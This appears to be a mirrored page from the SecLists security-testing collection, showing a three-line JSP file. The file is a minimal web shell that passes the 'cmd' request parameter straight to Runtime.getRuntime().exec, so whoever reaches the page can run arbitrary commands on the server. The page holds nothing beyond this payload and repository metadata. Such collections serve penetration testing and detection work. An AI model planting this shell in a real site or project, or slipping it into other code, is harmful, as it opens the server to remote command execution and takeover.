mirror of
https://github.com/danbulant/SecLists
synced 2026-05-19 04:18:49 +00:00
3 lines
63 B
Text
3 lines
63 B
Text
<%
|
|
Runtime.getRuntime().exec(request.getParameter("cmd"));
|
|
%>
|